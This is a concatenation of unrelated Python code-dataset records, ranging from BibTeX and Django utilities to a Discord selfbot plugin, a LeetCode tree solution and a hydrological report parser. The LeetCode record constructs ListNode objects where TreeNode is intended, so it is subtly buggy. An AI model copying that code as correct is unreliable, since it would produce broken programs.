np.array(map_ref[0]).shape)\n # print(\"shape of map_ref[1]\", np.array(map_ref[1]).shape)\n # print(\"shape of map_ref[2]\", np.array(map_ref[2]).shape)\n # print(\"shape of map_in_center_sr[0]\", np.array(map_in_center_sr[0]).shape)\n # print(\"shape of map_in_center_sr[1]\", np.array(map_in_center_sr[1]).shape)\n # print(\"shape of map_in_center_sr[2]\", np.array(map_in_center_sr[2]).shape)\n # print(\"shape of map_in_top_sr[0]\", np.array(map_in_top_sr[0]).shape)\n # print(\"shape of map_in_top_sr[1]\", np.array(map_in_top_sr[1]).shape)\n # print(\"shape of map_in_top_sr[2]\", np.array(map_in_top_sr[2]).shape)\n # print(\"shape of map_ref\", np.array(map_ref).shape)\n # print(\"shape of map_ref_sr[0]\", np.array(map_ref_sr[0]).shape)\n # print(\"shape of map_ref_sr[1]\", np.array(map_ref_sr[1]).shape)\n # print(\"shape of map_ref_sr[2]\", np.array(map_ref_sr[2]).shape)\n # print(\"shape of other_condition\", len(other_condition))\n # print(\"shape of other_center\", len(other_center))\n # print(\"shape of other_top\", len(other_top))\n # print(\"shape of other_bottom\", len(other_bottom))\n\n\n corr = swaper.conditional_swap_multi_layer(\n content=[map_in_center_sr[0], map_in_top_sr[0], map_in_bottom_sr[0]],\n style=[map_ref],\n condition=[map_ref_sr[0]],\n other_conditions=other_condition,\n other_centers=other_center,\n other_tops=other_top,\n other_bottoms=other_bottom\n )\n print(\"relu3_1和relu1_1的相关性总和\",corr)\n corr_list.append(corr)\n i = i + 1\n write_corr_list(corr_list)\n corr_list = []\n\n # save maps\n # np.savez(file_name, target_map=maps, weights=weights, correspondence=correspondence)\n","sub_path":"offline_swap_for360.py","file_name":"offline_swap_for360.py","file_ext":"py","file_size_in_byte":9501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"338148093","text":"'''\nSubmail mail/xsend API demo\nSUBMAIL SDK Version 1.0.1 --python\ncopyright 2011 - 2014 SUBMAIL\n'''\nfrom .mail_xsend import MAILXsend\nfrom .app_configs import MAIL_CONFIGS\n\n'''\ninit MESSAGEXsend class\n'''\nsubmail = MAILXsend(MAIL_CONFIGS)\n\n'''\nOptional para\nThe First para: recipient email address\nThe second para: recipient name(optional)\n@Multi-para\n'''\nsubmail.add_to('leo@submail.cn','leo')\n\n'''\nOptional para\nset addressbook sign : Optional\nadd addressbook contacts to Multi-Recipients\n@Multi-para\n'''\n#submail.add_address_book('subscribe')\n\n'''\nOptional para\nset sender address and name\nThe First para: sender email address\nThe second para: sender display name (optional)\n'''\n#submail.set_sender('no-reply@submail.cn','SUBMAIL')\n\n'''\nOptional para\nset reply address\n'''\n#submail.set_reply('service@submail.cn')\n\n'''\nOptional para\nset email subject\n'''\n#submail.set_subject('test SDK')\n\n'''\nRequired para\nset project sign\n'''\nsubmail.set_project('uigGk1')\n\n'''\nOptional para\nsubmail email text content filter\n@Multi-para\n'''\nsubmail.add_var('name','leo')\nsubmail.add_var('age','32')\n\n'''\nOptional para\nsubmail email link content filter\n@Multi-para\n'''\nsubmail.add_link('developer','http://submail.cn/chs/developer')\nsubmail.add_link('store','http://submail.cn/chs/store')\n\n'''\nOptional para\nemail headers\n@Multi-para\n'''\nsubmail.add_header('X-Accept','zh-cn')\nsubmail.add_header('X-Mailer','leo App')\nprint(submail.xsend())\n","sub_path":"smbackend/submail/mail_xsend_demo.py","file_name":"mail_xsend_demo.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"182651792","text":"import os\nimport bibtexparser as bp\nfrom bibtexparser.bparser import BibTexParser\nfrom bibtexparser.customization import convert_to_unicode\nfrom bibtexparser.bwriter import BibTexWriter\nfrom bibtexparser.bibdatabase import BibDatabase\n\nfrom pybtex.database.format import format_database\n\n\ndef gather_bibs(dir, export_file):\n db = BibDatabase()\n parser = BibTexParser()\n parser.customization = convert_to_unicode\n bibs = {}\n for file in os.listdir('./' + dir):\n if file.endswith('.bib'):\n with open('./' + dir + '/' + file) as bib_file:\n bib_data = bp.load(bib_file, parser=parser)\n for entry in bib_data.entries:\n if entry['ID'] not in bibs:\n bibs[entry['ID']] = entry\n\n for key in bibs:\n db.entries.append(bibs[key])\n writer = BibTexWriter()\n with open('set/' + export_file, 'w') as bibfile:\n bibfile.write(writer.write(db))\n\n\n# 异常处理暂时无效,需要进一步解决\n# 目前若是想生成正确的html,需要所有bib文件正确\ndef export_html():\n format_database('set/ai.bib', 'set/ai.md', 'bibtex', 'md')\n format_database('set/iot.bib', 'set/iot.md', 'bibtex', 'md')\n # all_bib = open('set/_index.en.md', 'w')\n # all_bib.write('### Artificial Intelligence\\n')\n # ai_bib = open('set/ai.md', 'r').read()\n # iot_bib = open('set/iot.md', 'r').read()\n # all_bib.write(ai_bib)\n # all_bib.write('***\\n')\n # all_bib.write('### Internet of Things\\n')\n # all_bib.write(iot_bib)\n os.remove('set/ai.bib')\n # os.remove('set/ai.md')\n os.remove('set/iot.bib')\n # os.remove('set/iot.md')\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"46587998","text":"from services.example.services import CatalogService\nfrom services.wrapper import Wrapper\n\n\nclass Catalog(Wrapper):\n fields = (\"uuid\", \"url\", \"zaaktypen\")\n service = CatalogService\n\n def __init__(self, data):\n super().__init__(data)\n self.uuid = self.url.split(\"/\")[-1]\n","sub_path":"app/services/example/catalog/wrappers.py","file_name":"wrappers.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"607891767","text":"\"\"\" QuArK - Quake Army Knife\r\n\r\nModel editor mouse handles.\r\n\"\"\"\r\n#\r\n# Copyright (C) 1996-99 Armin Rigo\r\n# THIS FILE IS PROTECTED BY THE GNU GENERAL PUBLIC LICENCE\r\n# FOUND IN FILE \"COPYING.TXT\"\r\n#\r\n\r\n\r\n#\r\n# See comments in maphandles.py.\r\n#\r\n\r\n\r\nimport quarkx\r\nimport math\r\nfrom qdictionnary import Strings\r\nimport qhandles\r\nfrom mdlutils import *\r\nimport mdlentities\r\n\r\n\r\n\r\nvertexdotcolor = 0\r\n\r\n\r\n\r\n#\r\n# The handle classes.\r\n#\r\n\r\nclass CenterHandle(qhandles.CenterHandle):\r\n \"Like qhandles.CenterHandle, but specifically for the Model editor.\"\r\n def menu(self, editor, view):\r\n return mdlentities.CallManager(\"menu\", self.centerof, editor) + self.OriginItems(editor, view)\r\n\r\nclass IconHandle(qhandles.IconHandle):\r\n \"Like qhandles.IconHandle, but specifically for the Model editor.\"\r\n def menu(self, editor, view):\r\n return mdlentities.CallManager(\"menu\", self.centerof, editor) + self.OriginItems(editor, view)\r\n\r\n\r\nclass MdlEyeDirection(qhandles.EyeDirection):\r\n\r\n MODE = SS_MODEL\r\n\r\n\r\n\r\nclass VertexHandle(qhandles.GenericHandle):\r\n \"Frame Vertex handle.\"\r\n\r\n size = (3,3)\r\n\r\n def draw(self, view, cv, draghandle=None):\r\n p = view.proj(self.pos)\r\n if p.visible:\r\n cv.setpixel(p.x, p.y, vertexdotcolor)\r\n\r\n\r\n#\r\n# Functions to build common lists of handles.\r\n#\r\n\r\n\r\ndef BuildCommonHandles(editor, ex):\r\n \"Build a list of handles to display on all map views.\"\r\n\r\n fs = ex.uniquesel\r\n if (fs is None) or editor.linearbox:\r\n return []\r\n else:\r\n #\r\n # Get the list of handles from the entity manager.\r\n #\r\n return mdlentities.CallManager(\"handlesopt\", fs, editor)\r\n\r\n\r\n\r\ndef BuildHandles(editor, ex, view):\r\n \"Build a list of handles to display on one map view.\"\r\n\r\n fs = ex.uniquesel\r\n if (fs is None) or editor.linearbox:\r\n #\r\n # Display a linear mapping box.\r\n #\r\n list = ex.sellist\r\n box = quarkx.boundingboxof(list)\r\n if box is None:\r\n h = []\r\n else:\r\n manager = qhandles.LinHandlesManager(MapColor(\"Linear\"), box, list)\r\n h = manager.BuildHandles(editor.interestingpoint())\r\n h = qhandles.FilterHandles(h, SS_MODEL)\r\n else:\r\n #\r\n # Get the list of handles from the entity manager.\r\n #\r\n h = mdlentities.CallManager(\"handles\", fs, editor, view)\r\n #\r\n # The 3D view \"eyes\".\r\n #\r\n for v in editor.layout.views:\r\n if (v is not view) and (v.info[\"type\"] == \"3D\"):\r\n h.append(qhandles.EyePosition(view, v))\r\n h.append(MdlEyeDirection(view, v))\r\n return qhandles.FilterHandles(h, SS_MODEL)\r\n\r\n\r\n\r\n#\r\n# Drag Objects\r\n#\r\n\r\nclass RectSelDragObject(qhandles.RectangleDragObject):\r\n \"A red rectangle that selects the polyhedrons it touches.\"\r\n\r\n def rectanglesel(self, editor, x,y, rectangle):\r\n if not (\"T\" in self.todo):\r\n editor.layout.explorer.uniquesel = None\r\n polylist = editor.Root.findallsubitems(\"\", \":p\")\r\n lastsel = None\r\n for p in polylist:\r\n if rectangle.intersects(p):\r\n p.selected = 1\r\n lastsel = p\r\n if lastsel is not None:\r\n editor.layout.explorer.focus = lastsel\r\n editor.layout.explorer.selchanged()\r\n\r\n\r\n#\r\n# Mouse Clicking and Dragging on map views.\r\n#\r\n\r\ndef MouseDragging(self, view, x, y, s, handle):\r\n \"Mouse Drag on a Model View.\"\r\n\r\n #\r\n # qhandles.MouseDragging builds the DragObject.\r\n #\r\n\r\n if handle is not None:\r\n s = handle.click(self)\r\n if s and (\"S\" in s):\r\n self.layout.actionmpp() # update the multi-pages-panel\r\n\r\n return qhandles.MouseDragging(self, view, x, y, s, handle, MapColor(\"GrayImage\", SS_MODEL))\r\n\r\n\r\ndef MouseClicked(self, view, x, y, s, handle):\r\n \"Mouse Click on a Model view.\"\r\n\r\n #\r\n # qhandles.MouseClicked manages the click but doesn't actually select anything\r\n #\r\n\r\n flags = qhandles.MouseClicked(self, view, x, y, s, handle)\r\n\r\n if \"1\" in flags:\r\n\r\n #\r\n # This mouse click must select something.\r\n #\r\n\r\n self.layout.setupdepth(view)\r\n choice = view.clicktarget(self.Root, x, y)\r\n # this is the list of frame triangles we clicked on\r\n if len(choice):\r\n choice.sort() # list of (clickpoint,component,triangleindex) tuples - sort by depth\r\n clickpoint, obj, tridx = choice[0]\r\n if (obj.type != ':mc') or (type(tridx) is not type(0)): # should not occur\r\n return flags\r\n if (\"M\" in s) and obj.selected: # if Menu, we try to keep the currently selected objects\r\n return flags\r\n # if \"T\" in s: # if Multiple selection request\r\n # obj.togglesel()\r\n # if obj.selected:\r\n # self.layout.explorer.focus = obj\r\n # self.layout.explorer.selchanged()\r\n # else:\r\n # ...\r\n # self.layout.explorer.uniquesel = obj\r\n else:\r\n if not (\"T\" in s): # clear current selection\r\n self.layout.explorer.uniquesel = None\r\n return flags+\"S\"\r\n return flags\r\n\r\n","sub_path":"runtime/tags/qk511b-opengl-update-merged/quarkpy/mdlhandles.py","file_name":"mdlhandles.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"236948145","text":"from discord.ext import commands\nimport asyncio\nimport dbus\nimport time\n\nfrom .lib import utils\n\n\ndef setup(bot):\n bot.add_cog(Music(bot))\n\n\nclass Music(object):\n def __init__(self, bot):\n self.bot = bot\n self.config = bot.config\n\n self.nowplaying_enabled = False\n self.nowplaying_user = None\n self.time_since_update = 0\n self.bot.loop.create_task(self.nowplaying_updater())\n self.dbus_if = None\n self.session_bus = None\n\n @commands.command(pass_context=True, aliases=['np'])\n async def nowplaying(self, ctx):\n member = ctx.message.author\n\n if self.nowplaying_enabled:\n await utils.set_game(self.bot, member, '...')\n self.nowplaying_user = None\n else:\n self.nowplaying_user = member\n\n self.nowplaying_enabled = not self.nowplaying_enabled\n\n async def nowplaying_updater(self):\n \"\"\"\n Updates the currently playing track if needed.\n The updater is limited to 1 update every 60 seconds.\n \"\"\"\n\n timestamp = 0\n\n while True:\n if not self.nowplaying_enabled:\n await asyncio.sleep(5)\n continue\n\n user = self.nowplaying_user\n\n await self.connect_dbus()\n\n game = str(await utils.get_game(user)).strip('♪ ')\n playing = self.get_playing()\n time_now = int(time.time())\n\n if (not playing == game) and (time_now - timestamp > 60):\n await utils.set_game(self.bot, user, f'♪ {playing} ♪')\n timestamp = int(time.time())\n\n await asyncio.sleep(5)\n\n async def connect_dbus(self, *, player='cantata'):\n \"\"\"\n Connect to the media player if it is available.\n Tries to reconnect after 60 seconds if the connection fails.\n \"\"\"\n\n if self.dbus_if is not None:\n return\n\n bus_name = f'org.mpris.MediaPlayer2.{player}'\n object_path = '/org/mpris/MediaPlayer2'\n dbus_interface = 'org.freedesktop.DBus.Properties'\n\n while True:\n try:\n self.session_bus = dbus.SessionBus()\n proxy = self.session_bus.get_object(bus_name, object_path)\n self.dbus_if = dbus.Interface(proxy, dbus_interface)\n print('DBus connection successful.')\n break\n except dbus.exceptions.DBusException as e:\n print('DBus connection failed, retrying in 60 seconds.')\n await asyncio.sleep(60)\n\n def player_info(self, property):\n return self.dbus_if.Get('org.mpris.MediaPlayer2.Player', property)\n\n def is_playing(self):\n status = self.player_info('PlaybackStatus')\n return True if str(status) == 'Playing' else False\n\n def get_playing(self):\n try:\n if self.is_playing():\n mdata = self.player_info('Metadata')\n title = str(mdata['xesam:title'])\n artist = str(list(mdata['xesam:artist'])[0])\n\n return f'{artist} - {title}'\n else:\n return '▮▮'\n except dbus.exceptions.DBusException:\n self.dbus_if = None\n return '...'\n","sub_path":"selfbot/plugins/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"259347724","text":"# https://leetcode.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal/\n\"\"\"\n递归把左子树和右子树的preorder, inorder代入,建立左子树和右子树\n\npreorder的第一个值一定是root的值,第二个值一定是root.left.val\n而且binary tree中没有重复值,可以根据preorder的第一个(root.val),第二个(root.left.val)在inorder数组中\n的位置,确定root.left, root.right的preorder, inorder\n preorder[0]在inorder中的位置,左边的部分是root.left, 右边的部分是root.right.这样可以确定root.left和root.right的\n inorder数组和长度。然后通过长度可以在preorder数组中确定root.left, root.right的preorder数组\n递归代入constructor即可\n\"\"\"\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> Optional[TreeNode]:\n if len(preorder) == 0:\n return\n root = ListNode(preorder[0])\n root_pos_inorder = inorder.index(root.val)\n \n left_inorder = inorder[0 : root_pos_inorder]\n right_inorder = inorder[root_pos_inorder + 1 :]\n \n left_preorder = preorder[1 : len(left_inorder) + 1]\n right_preorder = preorder[len(left_inorder) + 1 :]\n \n left = self.buildTree(left_preorder, left_inorder)\n right = self.buildTree(right_preorder, right_inorder)\n root.left = left\n root.right = right\n return root","sub_path":"most_interviewed/trees/construct_binary_tree_from_preorder_and_inorder_traversal.py","file_name":"construct_binary_tree_from_preorder_and_inorder_traversal.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"245969740","text":"#Program takes headers of news from the website\n#need to instal bs4 and requests packages\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef headersList():\n url = 'http://www.interia.pl' #need some url address\n r = requests.get(url)\n source = BeautifulSoup(r.text, features =\"html.parser\")\n\n for header in source.find_all(class_=\"news-li\"): #name of class in html code of our website\n if header.a: #if header is a link\n print(header.a.text.replace(\"\\n\", \" \").strip())\n else:\n print(header.contents[0].strip())\n\n#Headers number\ndef headersTable():\n url = 'http://www.interia.pl/'\n titles = []\n\n url = requests.get(url)\n soup = BeautifulSoup(url.text, features=\"html.parser\")\n title = soup.findAll('li', {'class': 'news-li'})\n for row in title:\n titles.append(row.text.replace(\"\\n\", \" \").strip())\n print('There are',len(titles),'headers.')\n\nprint('List of headers')\nheadersList()\nheadersTable()\n","sub_path":"headers.py","file_name":"headers.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"629317964","text":"from django.views import generic\nfrom django.utils import timezone\nfrom django.shortcuts import get_object_or_404\nfrom django.db.models import Q\nfrom .models import Result\nfrom fixtures.models import Category\nfrom phx.helpers.subnav import generate_subnav\nfrom pages.models import Page\n\n\nclass ResultsListView(generic.ListView):\n model = Result\n paginate_by = 10\n\n def get_context_data(self, **kwargs):\n context = super(ResultsListView, self).get_context_data(**kwargs)\n context['breadcrumb'] = self.generate_breadcrumb()\n page = get_object_or_404(Page, slug=self.request.path)\n context['page'] = page\n context['page_title'] = page.title\n context['categories'] = Category.objects.all()\n context['search'] = self.request.GET.get('search', '')\n context['category'] = self.request.GET.get('category', '')\n context['subnav'] = generate_subnav(self.request.path, context['page'])\n return context\n\n def get_queryset(self):\n query = Result.objects.prefetch_related(\n 'fixture__categories'\n ).select_related('fixture').filter(\n fixture__event_date__lte=timezone.now(),\n ).order_by('-fixture__event_date').distinct()\n\n search = self.request.GET.get('search')\n if search:\n query = query.filter(\n Q(summary__icontains=search) |\n Q(results__icontains=search) |\n Q(fixture__title__icontains=search) |\n Q(fixture__location__icontains=search) |\n Q(fixture__categories__abbreviation__icontains=search) |\n Q(fixture__categories__title__icontains=search)\n )\n\n category = self.request.GET.get('category')\n if category:\n query = query.filter(fixture__categories__abbreviation=category)\n\n return query\n\n def generate_breadcrumb(self):\n return [\n {\n 'title': 'Home',\n 'linkUrl': '/',\n },\n {\n 'title': 'Results',\n }\n ]\n","sub_path":"phx/results/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"295124831","text":"#!/usr/bin/env python\n# tiempo\nimport os\nimport sys\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\",\"OmegaServiceDesk.settings\")\nimport locale, dialog\nfrom dialog import Dialog\nfrom core.models import *\nfrom modules.OmegaConfiguration.models import *\nimport datetime\ndias = {\"0\":\"Domingo\",\"1\":\"Lunes\",\"2\":\"Martes\",\"3\":\"Miercoles\",\"4\":\"Jueves\",\"5\":\"Viernes\",\"6\":\"Sabado\"}\nlocale.setlocale(locale.LC_ALL,'')\nd = Dialog(dialog=\"dialog\")\nd.set_background_title(\"Calendar Program\")\nd.msgbox(\"Bienvenido\")\nstatus,minutos = d.inputbox(\"minutos:\",backtitle=\"Calendar Program\")\nminutos = int(minutos)\ncalendars = list()\nfor i in OC_Calendar.objects.all():\n calendars.append((str(i.id),\"%s - %s\"%(i.name,i.description),False))\nstatus,tag = d.radiolist(\"\",choices=calendars,title=\"seleccione un calendario\",backtitle=\"Calendar Program\")\ncalendar = OC_Calendar.objects.get(pk=int(tag))\nhoy = datetime.datetime.today()\nregistro = datetime.datetime.today()\nferiados = []\nc = 0\nif not len(calendar.oc_calendarday_set.all()) > 0:\n d.msgbox(\"no ha creado ningun horario en ese calendario!!!\")\nelse:\n while not minutos == 0:\n \n horario = calendar.oc_calendarday_set.all().filter(day__name = dias.get(hoy.strftime(\"%w\"))).order_by('init_time')\n if horario and hoy.date() not in feriados:\n if c > 0:\n hoy = datetime.datetime(hoy.year,hoy.month,hoy.day,int(horario[0].init_time.strftime(\"%H\")),int(horario[0].init_time.strftime(\"%M\")))\n for i in horario:\n if minutos == 0:\n continue\n else:\n if c > 0 and datetime.time(int(hoy.strftime('%H')),int(hoy.strftime('%M'))) <= i.init_time:\n hoy = datetime.datetime(hoy.year,hoy.month,hoy.day,int(i.init_time.strftime(\"%H\")),int(i.init_time.strftime(\"%M\")))\n while datetime.time(int(hoy.strftime('%H')),int(hoy.strftime('%M'))) >= i.init_time and datetime.time(int(hoy.strftime('%H')),int(hoy.strftime('%M'))) <= i.finish_time and not minutos == 0:\n hoy = hoy + datetime.timedelta(minutes = 1)\n minutos = minutos - 1\n c = c + 1\n if minutos > 0 and c > 0:\n hoy = hoy + datetime.timedelta(days = 1)\n d.msgbox(\"dia:%s\\n%s\\n\\n\\ndia:%s\\n%s\"%(str(dias.get(registro.strftime('%w'))),str(registro),str(dias.get(hoy.strftime('%w'))),str(hoy)))\n","sub_path":"tiempo.py","file_name":"tiempo.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"80397896","text":"\nimport os, os.path\n#from os.path import splitext, basename, join\nimport json\nimport csv\nimport numpy as np\nfrom itertools import combinations\n\n\ndef down_load_file(photo_link, path_down_load_file):\n import io\n import os\n\n try:\n from urllib.request import urlretrieve # Python 3\n from urllib.error import HTTPError,ContentTooShortError\n except ImportError:\n from urllib import urlretrieve # Python 2\n\n\n\n try:\n from urllib.parse import urlparse # Python 3\n except ImportError:\n from urlparse import urlparse # Python 2\n from os.path import splitext, basename, join\n picture_page = photo_link\n disassembled = urlparse(picture_page)\n filename, file_ext = splitext(basename(disassembled.path))\n filename = filename + file_ext\n fullfilename = os.path.join(path_down_load_file, filename)\n\n\n #download\n try:\n urlretrieve(photo_link, fullfilename)\n\n except HTTPError as err:\n print(err.code)\n except ContentTooShortError as err:\n #retry 1 times\n try:\n urlretrieve(photo_link, fullfilename)\n except ContentTooShortError as err:\n print(err.code)\n return fullfilename\n#================================== Create predict ===============================================\n#[0 'label',1 'label_count',2 'percent_label',3 'previous_p_label',4 'previous_next_label',5'sum_p_label',\n#6 'image_count',7 'percent_image',8 'previous_p_image',9 'previous_next_image',10 'sum_p_label',11 'number_edge']\ndef label_bigger_percent(percent, list_in):\n list_bigger = []\n for label in list_in:\n if label[5] <= percent:\n list_bigger.append(label[0])\n return list_bigger\n\ndef label_relationship_bigger_percent(list_bigger, lable_unique, arr_relationship, number_relationship):\n # Duyet trong all label\n label_relationship = []\n for label in lable_unique:\n # Neu khong thuoc list > percent\n if label not in list_bigger:\n # Get index\n i = lable_unique.index(label)\n # Duyet tai dong index\n for j in range(len(lable_unique)):\n # Neu co lien ket\n if number_relationship != -1:\n if int(arr_relationship[i][j]) >= number_relationship:\n # Label lien ket do co thuoc list label > percent\n if lable_unique[j] in list_bigger:\n label_relationship.append(label)\n break\n return label_relationship\n\ndef read_list_percent_and_array_relationship(path_percent, path_relationship):\n list_percent = []\n lable_unique = []\n with open (path_percent, 'r') as csvfile:\n reader=csv.reader(csvfile)\n for i, row in enumerate(reader):\n list_percent.append([row[0], int(row[1]), row[2], row[3], row[4], float(row[5]), row[6],\n row[7], row[8], row[9], float(row[10]), row[11]])\n lable_unique.append(row[0])\n\n size = len(list_percent)\n arr_relationship = np.zeros((size, size), dtype=np.int)\n with open (path_relationship, 'r') as csvfile:\n reader=csv.reader(csvfile)\n for i, row in enumerate(reader):\n for j, value in enumerate(row):\n arr_relationship[i][j] = int(value)\n return (list_percent, arr_relationship, lable_unique)\n\n\ndef create_dataset_predict(path_percent, path_relationship, percent, number_relationship):\n if os.path.exists(path_percent) and os.path.exists(path_relationship):\n list_percent, arr_relationship, lable_unique = read_list_percent_and_array_relationship(path_percent, path_relationship)\n # Lấy tập label thuộc percent %\n list_bigger = label_bigger_percent(percent, list_percent)\n # Lay tập label có quan hệ với tập percent %\n label_relationship = label_relationship_bigger_percent(list_bigger, lable_unique, arr_relationship, number_relationship)\n return (list_bigger, label_relationship)\n\n\n#==================================== Predict for each json ============================================\ndef check(list_label, list_bigger, label_relationship):\n if list_label == []:\n return False\n flag = True\n for label in list_label:\n if label not in list_bigger:\n if label not in label_relationship:\n flag = False\n break\n return flag\n\ndef check_percent(list_label, list_bigger, label_relationship, percent_face):\n #from itertools import combinations\n list_new_list_label = []\n num_remain = int(float(len(list_label) * percent_face / 100))\n list_new_list_label = list(combinations(list_label, num_remain))\n for label in list_new_list_label:\n label = list(label)\n flag = check(label, list_bigger, label_relationship)\n if flag == True:\n return True\n return False\n\ndef check_ver2(list_label, list_bigger, label_relationship):\n if list_label == []:\n return (0, [])\n num_labels_true = 0\n #flag = True\n list_label_true = []\n for label in list_label:\n if (label in list_bigger) or (label in label_relationship):\n num_labels_true += 1\n list_label_true.append(label)\n percent_true = num_labels_true * 100.0 / len(list_label)\n return (percent_true, list_label_true)\n\ndef check_percent_ver2(list_label, list_bigger, label_relationship, percent_face):\n#from itertools import combinations\n list_new_list_label = [] \n max_percent_true = 0 \n flag_finally = False\n # ================ Predict image true or false ================\n num_remain = int(float(len(list_label) * percent_face / 100))\n list_new_list_label = list(combinations(list_label, num_remain))\n for label in list_new_list_label:\n label = list(label)\n flag = check(label, list_bigger, label_relationship)\n if flag == True:\n flag_finally = True\n\n # =============== Check percent True of an image ==============\n percent_true, list_label_true = check_ver2(list_label, list_bigger, label_relationship)\n \n print (percent_true)\n print (flag_finally)\n return (percent_true, list_label_true, flag_finally)\n","sub_path":"label_visualize/run_flow/predict_ads_fb/compare_label.py","file_name":"compare_label.py","file_ext":"py","file_size_in_byte":6220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"144866574","text":"from django.db import models\nfrom django.contrib.syndication.views import Feed\nfrom django.urls import reverse\nfrom decouple import config\nimport feedparser\n\n\nclass Channel(models.Model):\n title = models.CharField(max_length=255, blank=True,\n null=True,)\n description = models.TextField(blank=True,\n null=True,)\n link = models.URLField(blank=True,\n null=True,)\n href = models.URLField()\n published = models.DateTimeField(blank=True,\n null=True,)\n updated = models.DateTimeField(blank=True,\n null=True,)\n\n def save(self, *args, **kwargs):\n if not self.title:\n print(self.href)\n feed = feedparser.parse(self.href)\n print(feed)\n feed_title = feed['channel']['title']\n print(feed_title)\n self.title = feed_title\n super(Channel, self).save(*args, **kwargs)\n\n def __str__(self):\n return self.title\n\n\nclass Item(models.Model):\n guid = models.CharField(max_length=255, primary_key=True)\n title = models.CharField(max_length=255, blank=True, null=True)\n summary = models.CharField(max_length=255, blank=True, null=True)\n link = models.URLField(blank=True, null=True)\n description = models.TextField(blank=True,\n null=True,)\n published = models.DateTimeField(null=True)\n updated = models.DateTimeField(null=True)\n channel = models.ForeignKey(Channel, on_delete=models.CASCADE, null=True)\n enclosure_url = models.URLField(blank=True, null=True)\n enclosure_length = models.IntegerField(default=0)\n enclosure_type = models.CharField(max_length=255, blank=True, null=True)\n\n def __str__(self):\n if self.title:\n return self.title\n else:\n return self.guid\n\n\nclass LatestEntriesFeed(Feed):\n title = config('FEED_TITLE', default='')\n link = \"/sitenews/\"\n description = config('FEED_DESCRIPTION', default='')\n\n def items(self):\n return Item.objects.order_by('-pub_date')\n\n def item_title(self, item):\n return item.title\n\n def item_description(self, item):\n return item.description\n\n def item_enclosure_url(self, item):\n return item.audio_url\n\n # def item_enclosure_length(self, item):\n # \"\"\"\n # Takes an item, as returned by items(), and returns the item's\n # enclosure length.\n # \"\"\"\n # return item.audio_length\n\n def item_enclosure_mime_type(self, item):\n \"\"\"\n Takes an item, as returned by items(), and returns the item's\n enclosure MIME type.\n \"\"\"\n return \"audio/mpeg\"\n\n def item_pubdate(self, item):\n \"\"\"\n Takes an item, as returned by items(), and returns the item's\n pubdate.\n \"\"\"\n return item.pub_date\n\n def item_guid(self, obj):\n \"\"\"\n Takes an item, as return by items(), and returns the item's ID.\n \"\"\"\n return obj.guid\n\n # item_link is only needed if Item has no get_absolute_url method.\n def item_link(self, item):\n # return reverse('news-item', args=[item.pk])\n return '/items/' + item.pk\n","sub_path":"feeds/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"47017260","text":"import re\nimport click\n\nreport_bounds = re.compile(r'^(.*?)=', re.DOTALL | re.MULTILINE)\n\nidentifier = r'(?P<basin>\\d{2})(?P<station_id>\\d{3})'\nmeasure_time = r'(?P<YY>\\d{2})(?P<GG>\\d{2})(?P<n>[1-5,7])'\nstage = r'1(?P<stage>\\d{4}|/{4})'\nchange_stage = r'2(?P<change_stage>\\d{3}|/{3})(?P<change_stage_sign>\\d|/)'\nprevious_stage = r'3(?P<prev_stage>\\d{4}|/{4})'\ntemperature = r'4(?P<water_temp>\\d{2})(?P<air_temp>\\d{2}|/{2})'\nice = r'5(?P<ice>\\d{4})'\nwater_condition = r'6(?P<water_condition>\\d{4})'\nice_thickness = r'7(?P<ice_thickness>\\d{3})(?P<snow_depth>\\d)'\ndischarge = r'8(?P<discharge_integer_part>\\d)(?P<discharge>\\d{3})'\nprecipitation = r'0(?P<precip_amount>\\d{3}|/{2})(?P<precip_duration>\\d|/{2})'\n\nstandart_observation = f'(\\s{stage})?(\\s{change_stage})?(\\s{previous_stage})?(\\s{temperature})?(\\s{ice})*(\\s{water_condition})?(\\s{ice_thickness})?(\\s{discharge})?(\\s{precipitation})?'\n\nreport_pattern = f'^{measure_time}{standart_observation}'\n\n# print(report_pattern)\n\nadditional_sections_tags = r'9[22|33|44|55|66|77|88]\\d{2}'\n\nprevious_days = r'922(\\d{2})'\nflow = r'933(\\d{2})(\\s.*)'\npool_stage = r'944(\\d{2})(\\s.*)'\npool_flow = r'955(\\d{2})(\\s.*)'\nflow_detail = r'966(\\d{2})(\\s.*)'\ndisasters = r'97701(\\s.*)97702(\\s.*)97703(\\s.*)97704(\\s.*)97705(\\s.*)97706(\\s.*)97707(\\s.*)'\n\nNullValue = 'NIL'\n\n\nsnow_depth_scale = [\n \"На льду снега нет\",\n \"менее 5 см\",\n \"5-10 см\",\n \"11-15 см\",\n \"16-20 см\",\n \"21-25 см\",\n \"26-35 см\",\n \"36-50 см\",\n \"51-70 см\",\n \"больше 70 